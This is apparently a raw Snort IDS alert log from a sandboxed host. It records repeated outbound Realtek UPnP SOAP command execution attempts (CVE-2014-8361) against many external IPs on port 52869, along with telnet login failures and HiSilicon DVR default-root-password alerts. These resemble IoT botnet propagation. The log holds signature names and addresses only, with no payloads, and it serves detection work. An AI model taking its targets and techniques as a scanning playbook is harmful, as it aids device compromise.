Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53780 -> 45.43.224.238:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53780 -> 45.43.224.238:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56812 -> 45.43.232.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56812 -> 45.43.232.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53460 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53460 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53464 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36894 -> 45.91.226.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36894 -> 45.91.226.68:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:57742
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:57742
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53074
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52752 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52752 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52754 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48052 -> 45.133.119.206:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48052 -> 45.133.119.206:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40946 -> 45.41.89.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40946 -> 45.41.89.70:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59546 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59546 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59550 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53796 -> 45.43.235.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53796 -> 45.43.235.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59826 -> 45.195.158.235:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59826 -> 45.195.158.235:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57990 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57990 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57992 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42006 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42006 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42010 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53144
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51422 -> 45.120.206.159:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51422 -> 45.120.206.159:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49978 -> 45.127.162.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49978 -> 45.127.162.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45072 -> 45.207.63.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45072 -> 45.207.63.40:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41756 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41756 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47610
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35666 -> 45.126.231.87:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35666 -> 45.126.231.87:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33618 -> 91.200.120.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55814 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55814 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55818 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56644 -> 45.138.68.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56644 -> 45.138.68.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43982 -> 45.158.21.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43982 -> 45.158.21.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34222 -> 45.43.238.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34222 -> 45.43.238.154:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56418 -> 45.250.173.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56418 -> 45.250.173.40:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35814
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35814
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35668 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35668 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33852 -> 45.127.160.139:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33852 -> 45.127.160.139:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35672 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53222
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58436
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58436
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49114 -> 45.113.2.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49114 -> 45.113.2.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60430 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60430 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60422 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60422 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60440 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60432 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57980 -> 45.43.239.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57980 -> 45.43.239.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52530 -> 91.200.120.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45416 -> 45.115.241.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45416 -> 45.115.241.9:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:54784 -> 92.180.159.76:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47584 -> 45.41.87.7:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47584 -> 45.41.87.7:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53350
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.117.83.97: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58046
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58046
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44276 -> 45.41.93.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44276 -> 45.41.93.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38550 -> 45.42.95.76:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38550 -> 45.42.95.76:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38806 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38806 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38810 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44516 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53422
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35694 -> 12.132.185.90:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47878
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60900 -> 189.112.111.254:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35168 -> 2.196.131.42:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58598 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53524
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60208 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52738 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58508 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36156 -> 14.250.139.253:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34680 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37994 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41416 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58760
